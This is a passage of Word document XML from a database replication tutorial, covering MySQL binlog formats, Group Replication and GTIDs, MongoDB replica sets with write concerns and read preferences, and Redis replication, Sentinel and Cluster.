        <w:gridCol w:w="2872"/>
        <w:gridCol w:w="2082"/>
        <w:gridCol w:w="2784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="513BB60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2AB9B3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Format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22B8E2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Logs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1B7A0F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Pros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2687FD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cons</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="5E83878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C2D819" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>STATEMENT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E921B5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>SQL statements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BEE283" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Compact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04998D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Non-deterministic functions break</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="2690B28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F2D639" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>ROW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1151E6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Before/after row images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7FD4DE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Deterministic, safe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165391" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Large for bulk operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="62D7216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1D9826" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>MIXED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6298A3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Statements when safe, rows when not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866CD8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Balanced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0A8D2F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Complex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="722A8599" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MySQL Group Replication (GR):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64543C76" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1529"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Built-in consensus (Paxos-based).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA05AB4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1529"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Automatic failover (no external tool needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C46B15" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1529"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Multi-primary mode available (any node accepts writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624CC73D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1529"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Conflict detection at certification stage (transaction certified by all group members before commit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36845B5C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GTID (Global Transaction Identifier):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB196FE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFA3516" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>GTID: server_uuid:transaction_number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D36A48" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Example: 3E11FA47-71CA-11E1-9E33-C80AA9429562:23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A1051A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="634D9215" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Every transaction gets a unique GTID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA0F17" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replicas track which GTIDs they've applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B51A890" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Failover: new replica asks "give me all GTIDs I haven't applied yet."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BC99E5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>No ambiguity about replication position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C68AA28" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 MongoDB Replication (Replica Sets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26546A58" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F807316" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>// Replica set configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCBC08C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>rs.initiate({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA6A57C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  _id: "myReplicaSet",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40274BBB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  members: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E911BED" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    { _id: 0, host: "mongo1:27017", priority: 2 },  // Preferred primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE92884" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    { _id: 1, host: "mongo2:27017", priority: 1 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC42C7E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">    { _id: 2, host: "mongo3:27017", priority: 1 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB9DC4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68102053" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4EBDD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C963B7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1530"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Oplog (operation log): capped collection recording all write operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39032292" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1530"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Secondaries continuously tail the primary's oplog and replay operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485212A1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1530"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Election: uses Raft-like consensus. Nodes vote for new primary if current is unreachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA1914B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1530"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Read preference: configurable per-query (primary, secondary, nearest, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444FA5D0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write concerns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9905E9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F84A453" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>db.orders.insertOne(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA0AE1C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  { item: "widget", qty: 5 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25445D96" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  { writeConcern: { w: "majority", j: true, wtimeout: 5000 } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC70F3F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A0AFDD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>// w: "majority" — write must be acknowledged by majority of replica set members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87922C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>// j: true — must be written to journal (durably) on those members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FF5025" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>// wtimeout: fail if not acknowledged within 5000ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B24AB9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read preferences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE96649" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5705D882" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>db.collection.find().readPref("secondaryPreferred")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164FD2D7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>// primary: always read from primary (strong consistency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F582CE5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>// secondary: always read from secondary (may be stale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BEF5CD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>// primaryPreferred: primary if available, else secondary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE8A48B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>// secondaryPreferred: secondary if available, else primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD57FE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>// nearest: lowest-latency node regardless of role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1925698B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.4 Redis Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4EAACC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FB41E2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary (redis.conf):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B328C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  # No special config needed — primary by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F0E96" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="768F4F5B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica (redis.conf):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E43F1B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  replicaof primary-host 6379</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955E220" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Redis replication works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED0AE15" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1531"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Full sync (initial):</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Replica connects → primary creates RDB snapshot → sends snapshot → replica loads it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B327E9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1531"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partial sync (ongoing):</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Primary maintains a replication backlog (circular buffer). Sends new commands to replica continuously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720EC5AC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1531"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reconnection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> If replica briefly disconnects, it sends its replication offset → primary sends only the missing commands (partial resync). If too much has been missed → full resync.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC241E2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis is ALWAYS asynchronous replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2666523F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1532"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary does NOT wait for replica acknowledgment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DF7E1" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1532"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>WAIT command: client can optionally block until N replicas acknowledge — but this is per-command, not a system setting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCB4709" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis Sentinel (automated failover):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6070E502" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E552A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Sentinel monitors primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE62B7C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Primary fails → Sentinel elects new primary from replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1F1E38" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Sentinel reconfigures other replicas to follow new primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D732F2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Clients query Sentinel for current primary address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CA3745" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis Cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7253D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1533"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Sharding + replication combined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721C6076" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1533"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>16,384 hash slots distributed across masters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD7DC3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1533"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Each master has 1+ replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBE7516" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1533"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Automatic failover within a shard if master dies.</w:t>
      </w:r>
    </w:p>
